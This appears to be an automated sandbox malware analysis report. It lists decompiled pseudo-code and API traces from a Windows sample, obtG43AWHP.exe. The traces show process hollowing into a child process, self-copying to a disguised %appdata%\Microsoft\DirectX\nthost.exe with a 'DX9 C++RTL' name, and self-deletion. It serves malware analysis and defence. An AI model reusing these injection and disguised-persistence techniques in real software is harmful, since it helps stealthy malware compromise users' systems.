    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3452 Parent PID: 3440

    Executed Functions

    Function 0020E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd
    Function 0020E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd
    Function 0020E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0020DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000017.00000002.1576107287.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_20d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3468 Parent PID: 3452

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
